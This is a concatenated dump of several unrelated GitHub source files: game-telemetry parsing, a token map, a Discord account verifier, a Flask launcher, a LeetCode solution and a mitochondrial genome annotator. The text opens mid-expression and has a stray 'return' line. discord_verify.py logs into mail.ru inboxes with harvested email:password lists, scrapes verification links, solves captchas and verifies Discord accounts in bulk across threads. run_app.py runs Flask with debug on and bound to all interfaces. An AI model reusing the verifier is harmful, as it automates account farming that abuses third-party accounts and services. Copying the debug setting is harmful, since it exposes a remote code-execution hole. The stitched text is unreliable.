                              str(TGD_List[1])+','+str(Unit_Type_Dict.get(TFI_List[int(TGD_List[2])-1]))+','+
                              str(list[(int(TGD_List[1]))]*int((Unit_Type_Dict.get(TFI_List[int(TGD_List[2])-1]))))+','+
                              str(TFG_List[4])+'\n')
    return r
def get_Turns(path):
    """Parse a Telem_GAME_Scores file and return
    [turns, winType, player0score, player1score, winner].

    NOTE(review): the appends run INSIDE the row loop, so the returned
    list grows by five entries per data row; callers index [0..4] and
    therefore only consume the FIRST row's values.  A file with no data
    rows makes the append lines raise NameError -- confirm telemetry
    always has at least one row.
    """
    game_scores_File = open(path,"r")
    turn_info_list=[]
    game_scores_File.readline()
    #loop to iterate telemetry file
    for row in game_scores_File:
        tempRow={}
        tempRow=row.split(",")
        turns=tempRow[0]
        type_Of_Win = tempRow[3]
        player0score = tempRow[1]
        player1score = tempRow[2]
        # winner: 0 when player 0 outscores player 1, else 1
        if int(tempRow[1]) > int(tempRow[2]):
            winner = 0
        else:
            winner = 1
        turn_info_list.append(turns)
        turn_info_list.append(type_Of_Win)
        turn_info_list.append(player0score)
        turn_info_list.append(player1score)
        turn_info_list.append(winner)
    game_scores_File.close()
    return turn_info_list
def get_dispand_info(path):
    """Read a Telem_GROUP_Disband file (header skipped) and return the
    first three comma-separated fields of every data row, flattened into
    one list.  The last field keeps its trailing newline, as the raw
    line is split without stripping."""
    info = []
    with open(path, 'r') as fh:
        fh.readline()  # skip the header row
        for line in fh:
            fields = line.split(",")
            info.extend(fields[:3])
    return info
def get_Initialization_info(path):
    """Read a Telem_GROUP_Initialization file (header skipped) and
    return column index 4 of every data row."""
    with open(path, 'r') as fh:
        fh.readline()  # skip the header row
        return [line.split(",")[4] for line in fh]
return initialization_info_list
list_files(rootdir) | [
"shaunhyp57@knights.ucf.edu"
] | shaunhyp57@knights.ucf.edu |
f3ddd2dab3b5302c60af59e19d6cc65c0cfc96bf | 31973632967be3dd06db9ac86435665616228b0c | /xtoken_map.py | 6cfce894b796b4f34304dfa89074f750eea51c2a | [] | no_license | tanupoo/penguin | 2d5f2f0dac935856cbc1ca533c6255e14be020b1 | a2911319e2aa31e0550bc36bfda728564d86727b | refs/heads/main | 2023-05-25T17:54:10.608657 | 2023-05-24T00:14:28 | 2023-05-24T00:14:28 | 249,449,058 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,972 | py | from datetime import datetime, timedelta
from hashlib import sha256
from random import random
"""
xpath and token map.
- generate token.
- validate token.
- remove token if validated.
- house keeping the map.
"""
class XTokenMap():
    """Map of one-time tokens to xpaths.

    - generate a token bound to an xpath
    - validate (and optionally consume) a token
    - house-keep the map: expire old entries and cap its size
    """
    def __init__(self, lifetime=7200, limit=1000, hard_limit=1300):
        """
        House-keeping policy: once the map reaches `hard_limit` entries,
        1. entries older than `lifetime` seconds are removed, then
        2. the oldest entries are dropped until at most `limit` remain.
        """
        self.xtmap = {}
        self.lifetime = lifetime
        self.limit = limit
        self.hard_limit = hard_limit

    def _gen_token(self):
        # NOTE: for security-sensitive tokens secrets.token_hex() would be
        # preferable to hashing random()+timestamp; kept for compatibility.
        m = sha256()
        m.update((str(random()) + str(datetime.now().timestamp())).encode())
        return m.hexdigest()

    def _housekeeping(self):
        # Nothing to do until the hard limit is reached.
        if len(self.xtmap) < self.hard_limit:
            return
        # Remove expired entries.
        cutoff = datetime.now() - timedelta(seconds=self.lifetime)
        for token, info in list(self.xtmap.items()):
            if info["accessed"] < cutoff:
                self.xtmap.pop(token)
        # Still too big: drop the OLDEST entries, keeping the newest
        # `limit` (dict preserves insertion order, oldest first).
        # BUG FIX: the original kept the FIRST -- i.e. oldest -- entries,
        # contradicting its own "remove oldest items" comment.
        if len(self.xtmap) >= self.limit:
            self.xtmap = dict(list(self.xtmap.items())[-self.limit:])

    def generate_token(self, xpath=None):
        """Create, register and return a new token bound to `xpath`."""
        self._housekeeping()
        token = self._gen_token()
        self.xtmap[token] = {
            "xpath": xpath,
            "accessed": datetime.now(),
            "authed": False,
        }
        return token

    def validate_token(self, token, xpath=None, remove_token=False,
                       check_authed=False):
        """Return True when `token` exists, matches `xpath` (when given)
        and -- when check_authed -- has been marked authed.

        The token is deleted on success when remove_token is True.
        BUG FIX: check_authed is now honored even when xpath is None
        (the original silently skipped the authed check in that case).
        """
        self._housekeeping()
        info = self.xtmap.get(token)
        if info is None:
            return False
        if xpath is not None and xpath != info["xpath"]:
            return False
        if check_authed is True and info["authed"] is False:
            return False
        if remove_token is True:
            self.remove_token(token)
        return True

    def token_set_authed(self, token):
        """Mark `token` as authenticated; ValueError if unknown."""
        info = self.xtmap.get(token)
        if info is None:
            raise ValueError("token is not valid.")
        info["authed"] = True

    def remove_token(self, token):
        """Delete `token` from the map; ValueError if unknown."""
        if self.xtmap.pop(token, None) is None:
            raise ValueError("token is not valid.")

    def counts(self):
        """Number of live tokens currently held."""
        return len(self.xtmap)
if __name__ == "__main__":
    # Smoke-test demo: basic generate/validate/remove round trip.
    import time
    xtmap = XTokenMap()
    t1 = xtmap.generate_token()
    print(xtmap.validate_token(t1))
    # an unknown (made-up) token must not validate
    print(xtmap.validate_token("5ecd5c301ac34bca3a57709edf3e1e9e07f9fcc07369bd989141951e12df8e45"))
    xtmap.remove_token(t1)
    # Exercise the size-based housekeeping.
    xtmap = XTokenMap(limit=5, hard_limit=10)
    for i in range(15):
        xtmap.generate_token()
    print("len=", xtmap.counts())
    # Exercise the lifetime-based housekeeping (1 s between inserts).
    xtmap = XTokenMap(lifetime=5, limit=5, hard_limit=7)
    for i in range(10):
        xtmap.generate_token()
        print("len=", xtmap.counts())
        time.sleep(1)
| [
"github-shoichi@tanu.org"
] | github-shoichi@tanu.org |
5ae1186a482bd5ce72bb88b91a51591fce531a64 | b9b347f7c6807942356856fd145d12bfd890c9ae | /discord_verify.py | 7fd080491dfc34ec12b22abecf63085781e1580c | [
"MIT"
] | permissive | nagjakolsitimang/AAAA | 48411dab8bf708acfc881a5b53d07a58d0166514 | 99190662ea7ebe60f05ddcbdf4aff2cc2647816c | refs/heads/master | 2020-03-20T11:45:28.383784 | 2018-06-14T21:49:40 | 2018-06-14T21:49:40 | 137,411,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,343 | py | import sys
import re
import recaptcha
import requests
import json
import random
import Queue
import threading
emails_q = Queue.Queue()
def debug(text, conf):
    """Print *text* with a [DEBUG] prefix when conf['debug'] is truthy.

    Uses the call form of print so the module also parses on Python 3
    (the original used a Python-2-only print statement).
    """
    if conf['debug']:
        print("[DEBUG] " + str(text))
def read_configurations():
    """Load settings from ./discord_verify.json and echo them.

    Returns the parsed dict; exits the process with status 1 if the file
    is missing or malformed.  Fixes: the file handle is now closed via a
    context manager and the Py2-only `except Exception, e` syntax is gone.
    """
    try:
        with open('discord_verify.json', 'r') as fh:
            conf = json.loads(fh.read())
        print("Loaded configs with values:")
        print("\temails_file: " + str(conf['emails_file']))
        print("\toutput_file: " + str(conf['output_file']))
        print("\ttimeout: " + str(conf['timeout']))
        print("\tnb_threads: " + str(conf['nb_threads']))
        print("\tdebug: " + str(conf['debug']))
        return conf
    except Exception as e:
        print(e)
        sys.exit(1)
def array_to_queue(arr, q):
    """Push every element of *arr* onto queue *q* and return the queue."""
    for element in arr:
        q.put(element)
    return q
def save_user(email, password, conf):
    """Append 'email:password' as one line to conf['output_file'].

    Fix: the file handle is now closed deterministically via `with`
    (the original relied on manual close and would leak on an exception).
    """
    debug("saving user", conf)
    with open(conf['output_file'], 'a') as output:
        output.write(":".join([email, password]) + "\n")
def get_headers():
    """Return the static HTTP header set used for the Discord requests."""
    headers = {
        'user-agent': 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16',
        'Host': 'discordapp.com',
        'Accept': '*/*',
        'Accept-Language': 'en-US',
        'Content-Type': 'application/json',
        'Referer': 'https://discordapp.com/register',
        'DNT': '1',
        'Connection': 'keep-alive',
    }
    return headers
def verify(email, password, conf):
    """Verify a Discord account through its mail.ru inbox.

    Logs into mail.ru, scrapes the Discord verification message, follows
    the activation link and posts the token plus a solved captcha to the
    Discord verify endpoint.  Returns True if the POST was issued.
    NOTE(review): Python 2 code — response.text.encode('utf-8') yields
    bytes under Python 3 and would break the regex/file writes.
    """
    debug("verifying : "+email+" "+password, conf)
    headers = get_headers()
    ss = requests.Session()
    debug("opening email", conf)
    # authenticate against mail.ru with the harvested credentials
    response = ss.post('https://auth.mail.ru/cgi-bin/auth', {
        'post': None,
        'mhost': 'mail.ru',
        'login_from': None,
        'Login': email,
        'Domain': 'mail.ru',
        'Password': password})
    text = response.text.encode('utf-8').replace("\n", "")
    debug("trying to find link", conf)
    # dump the mailbox page for offline debugging
    open('MAILRU.html', 'w').write(text)
    # message id of the "Verify Email Address for Discord" mail
    link = re.findall('id: "(\d+)",\s*prev:\s*"\d*",\s*next:\s*"\d*",\s*subject:\s*u\("Verify Email Address for Discord"\)', text)[0]
    debug("found email link: "+link, conf)
    response = ss.get('https://m.mail.ru/message/{0}'.format(link))
    # the activation URL is percent-encoded inside the message body
    activation = re.findall('url=(https%3A%2F%2Fdiscordapp.com%2Fverify[^"]+)"', response.text.encode('utf-8'))[0]
    activation = requests.utils.unquote(activation)
    debug("found activation link: "+activation, conf)
    token = re.findall("token=([^&]+)&", activation)[0]
    debug("token is "+token, conf)
    debug("opening activation link", conf)
    ss.get(activation,
           headers=headers,
           timeout=conf['timeout'])
    debug("fetching a captcha", conf)
    captcha = recaptcha.GetCaptcha()
    payload = {
        'token': token,
        'captcha_key': captcha
    }
    debug("sending payload:"+str(payload), conf)
    response = ss.post(
        'https://discordapp.com/api/v6/auth/verify',
        json=payload,
        headers=headers,
        timeout=conf['timeout']
    )
    return True
def worker(conf):
    """Thread body: drain the global emails_q, verifying each entry.

    Each queue item is an 'email:password' string.  Successful
    verifications are appended to the output file via save_user().
    Fixes: Py2-only `except Exception, e` syntax and the Py2-only
    `e.message` attribute (str(e) is portable and equivalent here).
    """
    debug("worker started", conf)
    while not emails_q.empty():
        email_pwd = emails_q.get()
        emails_q.task_done()
        email = email_pwd.split(":")[0]
        e_password = email_pwd.split(":")[1]
        try:
            verify(email, e_password, conf)
            save_user(email, e_password, conf)
        except Exception as e:
            print(str(e))
            debug("could not verify " + str(e), conf)
def main():
    """One full pass: load config, build the work queue, run the threads."""
    global emails_q
    print "Starting"
    conf = read_configurations()
    data = [x.rstrip() for x in open(conf['emails_file'], 'r').readlines()]
    emails = []
    # already-processed pairs are skipped so reruns resume where they stopped
    alreadydone = [x.rstrip() for x in open(conf['output_file'], 'r').readlines()]
    for _ in data:
        try:
            # columns 2 and 3 of the colon-separated input hold email:password
            email = _.split(':')[2] + ':' + _.split(':')[3]
            if email not in alreadydone:
                emails.append(email)
        except:
            # malformed lines (too few columns) are silently skipped
            pass
    emails_q = array_to_queue(emails, emails_q)
    tx = []
    debug("Starting "+str(conf['nb_threads'])+" threads", conf)
    for i in range(conf['nb_threads']):
        mT = threading.Thread(target=worker, args=(conf, ))
        mT.start()
        tx.append(mT)
    # wait for all workers to drain the queue
    for t in tx:
        t.join()
    print "Finished"
if __name__ == "__main__":
    # Run forever, restarting the whole verification pipeline after each pass.
    while 1:
        main()
| [
"noreply@github.com"
] | noreply@github.com |
1df7189cda9f9e9f78c0932201794628cc7a950a | 5de989040aeebc58047ee43f9f518393b1f4ff15 | /run_app.py | bf9eb34b3468066186f84902e572deb55b784e50 | [] | no_license | bosefalk/WFB-simulation | 5e8750182abeeb29fe7feab6afaef98a725149d6 | 0cb967534b0b805d5a52932fa58712f9974fdc91 | refs/heads/master | 2021-01-19T04:49:59.974014 | 2017-04-29T13:33:15 | 2017-04-29T13:33:15 | 87,400,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | from flask_main import app
if __name__ == "__main__":
    # Development server only: binds every interface with the debugger on.
    # Never run with debug=True in production.
    app.run(debug=True, host='0.0.0.0')
"bosefalk@gmail.com"
] | bosefalk@gmail.com |
0d538a63482a65ea73dac9def3fb1b15e7b85c5b | bd3a0f9e15d6258b6cdfd8288b9d31379a941fac | /Medium/ContainerWithMostWater.py | 685ac1b98d20361f356423dc354aec4694912a88 | [] | no_license | denmarktayong7/LeetCode | e9b15a94efd9f93708f6ee6c0bb7ae76bc3983d4 | ca1c4a20320d66d1dea2c96fda456550d94e46fe | refs/heads/master | 2021-07-07T17:10:31.087943 | 2021-03-27T15:54:42 | 2021-03-27T15:54:42 | 233,178,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | class Solution:
def maxArea(self, height: List[int]) -> int:
bestArea = 0
pt1 = 0 #left pointer
pt2 = len(height) - 1 #right pointer
while(pt1 < pt2):
bestArea = max(bestArea, min(height[pt1], height[pt2]) * (pt2 - pt1))
if(height[pt1] > height[pt2]):
pt2 -= 1
else:
pt1 += 1
return bestArea
| [
"noreply@github.com"
] | noreply@github.com |
cf64837efa8aa84185b39f8448f6d16429850db7 | 4523542cf50113daf5ee59f1d59a46309ab99c89 | /anno.py | d1d944f3a0ef4ca92ddfb51b6de52184e5b41636 | [] | no_license | Runsheng/mitovar | 798da8447387092cbf98329cc8ad10948b65bce0 | f514fe0bce7b2bc96e282a5d2e340d36e306ef8d | refs/heads/master | 2022-01-11T12:20:48.080720 | 2022-01-04T03:18:55 | 2022-01-04T03:18:55 | 78,615,609 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 17,005 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2016/12/9 13:08
# @Author : Runsheng
# @File : anno.py
"""
Try to annotate the assembly of mito scafs, including the tRNA, rRNA and coding genes
Find the tRNA-phe, set it as the start point of the new reference genome.
Get the annotation for rRNA and tRNA, store as .tbl file, used for tbl2asn submission
Get the annotation for CDS and proteins, store as .tbl file, used for tbl2asn submission.
Write the CDS and protein sequence out as fasta file, together with the orthology table, used for tree construction.
"""
from utils import fasta2dic, chr_select, myexe, dic2fasta
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
from Bio import SearchIO, SeqIO, SeqUtils
import os
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
##################CDS part
def exonerate_wrapper(query, target, outfile=False, geneticcode=5, score=100, bestn=None):
    """Run exonerate on *query* vs *target* and return its stdout as a string.

    geneticcode 5 is the invertebrate mitochondrial code.  When *outfile*
    is truthy, the captured output is also written to '<query stem>.exonerate'.

    Bug fix: the original wrote the output file NAME into the file instead
    of the exonerate output itself.
    """
    if bestn is None:
        # default: report one region per sequence in the target file
        bestn = len(fasta2dic(target))
    exonerate_cmd = ("exonerate {query} {target} "
                     "--geneticcode {geneticcode} "
                     "--score {score} "
                     "--bestn {bestn} ").format(
        query=query, target=target,
        geneticcode=geneticcode,
        score=score,
        bestn=bestn,
    )
    out = myexe(exonerate_cmd)
    if outfile:
        outname = query.split("/")[-1].split(".")[0] + ".exonerate"
        with open(outname, "w") as fw:
            fw.write(out)
    return out
def exonerate_parser(exonerate_file):
    """
    Parse raw exonerate text output into 4-column bed entries.

    bed4: [chro, start, end, name], e.g. ["seq1", 1, 55, "trnP"]

    :param exonerate_file: exonerate stdout as a single string
    :return: sorted list of bed4 lists with 1-based inclusive coordinates
    """
    bed4 = []
    texts = SearchIO.parse(StringIO(exonerate_file), format="exonerate-text")
    try:
        for record in texts:
            for hsp in record:
                for s in hsp:
                    # Biopython SearchIO intervals are 0-based half-open
                    # [start, end); +1 on start gives 1-based inclusive coords
                    table_4 = [s.fragment.query_id, s.fragment.query_start + 1, s.fragment.query_end, s.fragment.hit_id]
                    bed4.append(table_4)
    except ValueError as e:
        # empty / truncated exonerate output: return whatever was collected
        pass
    bed4.sort()
    return bed4
def exonerate_parser_write(query, exonerate_file, prefix=None):
    """
    Write the CDS and protein sequences found by exonerate to two FASTA files.

    Each record header is '>HIT_ID CHRO:START-END' (position appended with a
    space separator).

    :param query: FASTA file the exonerate run was made against
    :param exonerate_file: exonerate stdout as a single string
    :param prefix: output prefix; defaults to the query filename stem
    :return: (cds_outname, p_outname) tuple of written filenames
    """
    ref_dict = fasta2dic(query)
    if prefix is None:
        prefix = query.split(".")[0]
    p_outname = (prefix + "_exonerate_p.fa")
    cds_outname = (prefix + "_exonerate_cds.fa")
    # NOTE(review): handles are not closed explicitly; content may not be
    # flushed until interpreter exit
    fw_p = open(p_outname, "w")
    fw_cds = open(cds_outname, "w")
    texts = SearchIO.parse(StringIO(exonerate_file), format="exonerate-text")
    for record in texts:
        for hsp in record:
            for s in hsp:
                name_str = ">" + s.fragment.hit_id
                # nucleotide slice of the query corresponding to this fragment
                name_cds, cds_str = chr_select(ref_dict, s.fragment.query_id, s.fragment.query_start,
                                               s.fragment.query_end)
                # exonerate's translated query is the protein sequence
                p_str = str(s.fragment.query.seq)
                fw_p.write(name_str + " " + name_cds + "\n" + p_str + "\n")
                fw_cds.write(name_str + " " + name_cds + "\n" + cds_str + "\n")
    return cds_outname, p_outname
def _exon_corrector(cds_outname, p_outname, prefix=None):
    """
    Collapse duplicate gene hits, keeping only the longest CDS per gene.

    For genes reported in several segments this simply picks the longest
    one rather than merging the pieces (acknowledged limitation).  Writes
    '<prefix>_cds_corr.fasta' and '<prefix>_p_corr.fasta'.
    """
    cds_d = {}
    p_d = {}
    if prefix is None:
        prefix = cds_outname.split("_")[0]
    # cds and protein FASTA files are parallel: iterate them in lockstep
    for cds, p in zip(SeqIO.parse(cds_outname, "fasta"), SeqIO.parse(p_outname, "fasta")):
        name, anno = cds.description.split(" ")
        __ = anno.split(":")  # positional annotation, currently unused
        key = "#".join([prefix, name])
        if key in cds_d.keys():
            seq_old = cds_d[key]
            # keep the longer of the two candidate sequences
            if len(cds) > len(seq_old):
                cds_d[key] = cds
                p_d[key] = p
            else:
                pass
        else:
            cds_d[key] = cds
            p_d[key] = p
    dic2fasta(cds_d, "_".join([prefix, "cds", "corr.fasta"]))
    dic2fasta(p_d, "_".join([prefix, "p", "corr.fasta"]))
def genbank_parser(gbfile, prefix=None):
    """
    Extract CDS and protein sequences from a GenBank file.

    Records are keyed '<prefix>#<gene>'; when a gene appears more than once
    only the longest CDS (and its translation) is kept.  Writes
    '<prefix>_cds_corr.fasta' and '<prefix>_p_corr.fasta'.

    :param gbfile: GenBank file path
    :param prefix: output prefix; defaults to the file stem
    """
    cds_d = {}
    p_d = {}
    if prefix is None:
        prefix = gbfile.split(".")[0]
    for record in SeqIO.parse(gbfile, format="genbank"):
        for i in record.features:
            if i.type == "CDS":
                name = "".join(i.qualifiers["gene"])
                # qualifier values are lists; join them into plain strings
                p = "".join(i.qualifiers['translation'])
                cds = str(i.extract(record.seq))
                key = "#".join([prefix, name])
                if key in cds_d.keys():
                    seq_old = cds_d[key]
                    # keep the longer duplicate, mirroring _exon_corrector
                    if len(cds) > len(seq_old):
                        cds_d[key] = cds
                        p_d[key] = p
                    else:
                        pass
                else:
                    cds_d[key] = cds
                    p_d[key] = p
    dic2fasta(cds_d, "_".join([prefix, "cds", "corr.fasta"]))
    dic2fasta(p_d, "_".join([prefix, "p", "corr.fasta"]))
def flow_exon(query, target, outfile=None, geneticcode=5, prefix=None):
    """
    Run exonerate and write the matched CDS regions and translated proteins.

    The default geneticcode 5 is the invertebrate mitochondrial code.

    :param query: FASTA file to annotate
    :param target: FASTA file of reference proteins
    :param outfile: passed through to exonerate_wrapper (write raw output)
    :param prefix: output prefix for the FASTA files
    """
    outfile = exonerate_wrapper(query, target, outfile, geneticcode)
    cds_out, p_out = exonerate_parser_write(query, outfile, prefix)
    # _exon_corrector(cds_out, p_out)  # in the default mode no re-selection is needed
####rrna
def rrna_tbl_get(query, target, outfile=False, geneticcode=5):
    """Locate rRNA genes with exonerate and return them as bed4 intervals."""
    raw_output = exonerate_wrapper(query, target, outfile, geneticcode)
    return exonerate_parser(raw_output)
def cds_tbl_get(query, target, outfile=False, geneticcode=5):
    """Locate protein-coding genes with exonerate and return bed4 intervals."""
    raw_output = exonerate_wrapper(query, target, outfile, geneticcode)
    return exonerate_parser(raw_output)
def get_cogfile(fastafile, wkdir=None, out="m20.txt"):
    """
    Build the ortholog table used for ete alignment.

    Input names look like '<species>#<gene>'; names sharing a gene suffix
    end up on one tab-separated line of *out*, e.g.
    "ppac#ND4\tcele#ND4\n".  Returns the output filename.

    Fixes: the output handle is now closed via `with` (it was leaked) and
    Py2-only dict.iteritems() is replaced by .values() (the key was unused).
    """
    if wkdir is None:
        wkdir = os.getcwd()
    os.chdir(wkdir)
    fa_d = fasta2dic(fastafile)
    name_d = {}
    for k in fa_d.keys():
        suffix = k.split("#")[1]
        # setdefault replaces the try/except KeyError grouping dance
        name_d.setdefault(suffix, []).append(k)
    with open(out, "w") as fw:
        for v in name_d.values():
            fw.write("\t".join(v))
            fw.write("\n")
    return out
#################### end of CDS part
#### end of rrna
#################### trna part
def mitfi_wrapper_trna(fastafile, MITFIPATH=None, prefix=None):
    """
    Run the bundled mitfi.jar tRNA finder on *fastafile*.

    mitfi.jar lives under <package>/bins/mitfi unless MITFIPATH is given.
    The raw report is echoed, saved to '<prefix>_trna.txt' and that
    filename is returned.
    """
    if MITFIPATH is None:
        path = os.path.dirname(__file__)
        MITFIPATH = os.path.join(path, "bins", "mitfi")
    jarfile = os.path.join(MITFIPATH, "mitfi.jar")
    mitfi_cmd = "java -jar {jarfile} {fastafile}".format(
        jarfile=jarfile, fastafile=fastafile)
    trna_out = myexe(mitfi_cmd)
    print(trna_out)
    if prefix is None:
        # filename without directory and without the final extension
        prefix = ".".join(fastafile.split("/")[-1].split(".")[0:-1])
    with open(prefix + "_trna.txt", "w") as fw:
        fw.write(trna_out)
    return prefix + "_trna.txt"
def trnafile_parser(trnafile):
    """Parse a mitfi tRNA report into bed4 records.

    Each record is [header, start, stop, one-letter amino acid]; lines
    starting with '#' are skipped.
    """
    records = []
    with open(trnafile, "r") as handle:
        for raw in handle:
            if raw.startswith("#"):
                continue
            header, start, stop, _score, _evalue, _ac, aa, _model, _strand = raw.strip().split("\t")
            records.append([header, int(start), int(stop), aa[0]])
    return records
def tbl_format(bed4_rrna, bed4_cds, bed4_trna):
    """Merge rRNA/CDS/tRNA bed4 intervals into NCBI .tbl feature lines.

    Every feature contributes a coordinate line plus key/value qualifier
    lines; CDS features emit both a 'gene' and a 'CDS' entry (with
    transl_table 5).  All three lists must come from the same reference;
    otherwise an error string is returned instead of the line list.

    todo: add the positions of the non-coding regions as NCR (gap > 20)
    """
    # sanity check: all annotations must share one reference name
    if not (bed4_rrna[0][0] == bed4_cds[0][0] == bed4_trna[0][0]):
        return "Error, annotations not from the same reference!"
    # map each feature name to its feature class; CDS assignment last so it
    # wins on (unexpected) name collisions, as in the original ordering
    feature_type = {}
    for record in bed4_rrna:
        feature_type[record[3]] = "rRNA"
    for record in bed4_trna:
        feature_type[record[3]] = "tRNA"
    for record in bed4_cds:
        feature_type[record[3]] = "CDS"
    out_lines = []
    for chro, start, end, anno in sorted(bed4_rrna + bed4_cds + bed4_trna):
        kind = feature_type[anno]
        if kind == "tRNA":
            # expand the one-letter code, e.g. 'P' -> 'tRNA-Pro'
            seq3 = "tRNA-" + str(SeqUtils.seq3(anno))
            out_lines.append("{start}\t{end}\t{type}\n\t\t\t{key}\t{value}\n".format(
                start=start, end=end, type="tRNA", key="product", value=seq3))
        elif kind == "rRNA":
            out_lines.append("{start}\t{end}\t{type}\n\t\t\t{key}\t{value}\n".format(
                start=start, end=end, type="rRNA", key="product", value=anno))
        elif kind == "CDS":
            gene_part = "{start}\t{end}\t{type}\n\t\t\t{key}\t{value}\n".format(
                start=start, end=end, type="gene", key="gene", value=anno)
            cds_part = "{start}\t{end}\t{type}\n\t\t\t{key1}\t{value1}\n\t\t\t{key2}\t{value2}\n".format(
                start=start, end=end, type="CDS",
                key1="product", value1=anno,
                key2="transl_table", value2=5)
            out_lines.append(gene_part + cds_part)
    return out_lines
def _cmsearch_wrapper_rrna(fastafile, MITFIPATH=None):
    """
    Run mitfi.jar in cmsearch mode against the bundled rRNA covariance model.

    todo: too slow to be practical; maybe switch to INFERNAL 1.1.
    Saves the report to '<prefix>_rrna.txt' and returns that filename.
    """
    if MITFIPATH is None:
        path = os.path.dirname(__file__)
        MITFIPATH = os.path.join(path, "bins", "mitfi")
    jarfile = os.path.join(MITFIPATH, "mitfi.jar")
    # covariance model shipped with the package
    rrna_cm = os.path.join(os.path.dirname(__file__), "bins", "mitfi", "r_rna.cm")
    mitfi_cmd = "java -jar {jarfile} -cm {rrna_cm} -top {fastafile}".format(
        jarfile=jarfile, fastafile=fastafile, rrna_cm=rrna_cm)
    rrna_out = myexe(mitfi_cmd)
    print(rrna_out)
    prefix = fastafile.split("/")[-1].split(".")[0]
    with open(prefix + "_rrna.txt", "w") as fw:
        fw.write(rrna_out)
    return prefix + "_rrna.txt"
def get_tnra_pro(fastafile, mitfi_out):
    """
    Find the best-scoring tRNA-Pro hit to use as the new genome start.

    :param fastafile: single-sequence mtDNA FASTA (sanity-checked)
    :param mitfi_out: mitfi tRNA report filename
    :return: (start_position, strand) tuple, or None for multi-record input
    """
    fasta_d = fasta2dic(fastafile)
    if len(fasta_d) != 1:
        print("Check the fasta file and make it continues one!")
        return None
    ###### get the start point of trna_Pro and the strand
    trna_pro_start = None
    trna_pro_socre = 0
    strand = "+"
    fr = open(mitfi_out, "r")
    for line in fr.readlines():
        terms = line.strip().split("\t")
        header, start, stop, score, evalue, AC, AA, model, strand = terms
        # keep the highest-scoring significant Pro hit
        # NOTE(review): trna_pro_socre is stored as a string after the first
        # hit, so later float>str comparisons rely on Py2 semantics — verify
        if AA == "P" and float(score) > trna_pro_socre and float(evalue) <= 0.001:
            if strand == "+":
                trna_pro_start = int(start)
            elif strand == "-":
                # on the minus strand the biological start is the stop coord
                trna_pro_start = int(stop)
            trna_pro_socre = score
    fr.close()
    return (trna_pro_start, strand)
def re_order(fastafile, newstart, strand="+", outfasta=None):
    """
    Rotate a circular single-sequence FASTA so it starts at *newstart*.

    :param fastafile: FASTA with exactly one sequence
    :param newstart: new start point, 1-based
    :param strand: "+" or "-"; "-" reverse-complements before rotating
    :param outfasta: output name; defaults to '<stem>_ordered.fasta'
    :return: the output filename, or None for multi-record input

    Fix: dict.keys()[0] / dict.values()[0] are not indexable on Python 3;
    next(iter(...)) behaves identically on both interpreters.
    """
    fasta_d = fasta2dic(fastafile)
    if len(fasta_d) != 1:
        print("Check the fasta file and make it continues one!")
        return None
    chro = next(iter(fasta_d))
    seq = fasta_d[chro]
    # derive the output filename from the input stem when not supplied
    if outfasta is None:
        prefix = fastafile.split("/")[-1].split(".")[0]
        outfasta = prefix + "_ordered.fasta"
    if strand == "-":
        # mirror the start coordinate, then flip the sequence
        newstart = len(seq) - newstart + 1
        seq = seq.reverse_complement()
        fasta_d = {chro: seq}
    print(newstart)
    # rotate: [newstart..end] followed by [begin..newstart)
    frg_1 = chr_select(record_dict=fasta_d, chro=chro, start=newstart - 1, end=len(seq))[1]
    frg_2 = chr_select(record_dict=fasta_d, chro=chro, start=0, end=newstart - 1)[1]
    seq_new = "".join([frg_1, frg_2])
    with open(outfasta, "w") as fw:
        fw.write(">" + chro + "_re" + "\n")
        fw.write(seq_new)
        fw.write("\n")
    return outfasta
def flow_re_order(fastafile, MITFIPATH=None, outfasta=None):
    """Find tRNA-Pro with mitfi and rotate the genome to start there."""
    mitfi_report = mitfi_wrapper_trna(fastafile, MITFIPATH)
    newstart, strand = get_tnra_pro(fastafile, mitfi_report)
    return re_order(fastafile, newstart, strand, outfasta)
#### flow for tbl generation
def pre_fsa(fastafile, spe_name=None, out=None):
    """
    Write the .fsa file required by tbl2asn.

    The header line carries the NCBI source qualifiers (organism,
    chromosome=mt, gcode=5, circular/complete) and the file is named
    '<species>.fsa'.  Returns the output filename.

    Fix: dict.values()[0] is not indexable on Python 3;
    next(iter(...)) behaves identically on both interpreters.
    """
    fa_d = fasta2dic(fastafile)
    if spe_name is None:
        spe_name = fastafile.split(".")[0]
    if out is None:
        out = spe_name + ".fsa"
    fastaname = spe_name.replace(" ", "_")  # the species name may contain spaces
    # mtDNA header line ready for submission
    header = ">{fastaname} [organism={spe_name}] [chromosome=mt] [moltype=genomic DNA] " \
             "[gcode=5] [Topology=Circular] [Completedness=Complete] " \
             "{spe_name} mitochondrion, complete genome.".format(
                 fastaname=fastaname, spe_name=spe_name)
    with open(out, "w") as fw:
        fw.write(header)
        fw.write("\n")
        fw.write(str(next(iter(fa_d.values())).seq))
        fw.write("\n")
    return out
def flow_tbl(fasta_order, cds_ref, r_ref, spe_name=None, MITFIPATH=None):
    """
    Produce the .fsa and .tbl pair for a tbl2asn submission.

    :param fasta_order: re-ordered mtDNA FASTA (see flow_re_order)
    :param cds_ref: reference protein FASTA for the CDS search
    :param r_ref: reference rRNA FASTA
    :param spe_name: species name; defaults to the file stem
    :return: (fsa_name, tbl_name)
    """
    prefix = ".".join(fasta_order.split(".")[0:-1])
    if spe_name is None:
        spe_name = prefix
    # gather the three annotation tracks
    trnafile = mitfi_wrapper_trna(fasta_order, MITFIPATH, prefix=prefix)
    bed4_trna = trnafile_parser(trnafile)
    bed4_rrna = rrna_tbl_get(fasta_order, r_ref)
    bed4_cds = cds_tbl_get(fasta_order, cds_ref)
    tbl_out = tbl_format(bed4_rrna, bed4_cds, bed4_trna)
    fsa_name = pre_fsa(fasta_order, spe_name)
    # tbl files start with a '>Feature <fsa>' header line
    headstr = ">Feature\t" + fsa_name + "\n"
    tbl_out = [headstr] + tbl_out
    tbl_name = spe_name + ".tbl"
    with open(tbl_name, "w") as fw:
        fw.write("".join(tbl_out))
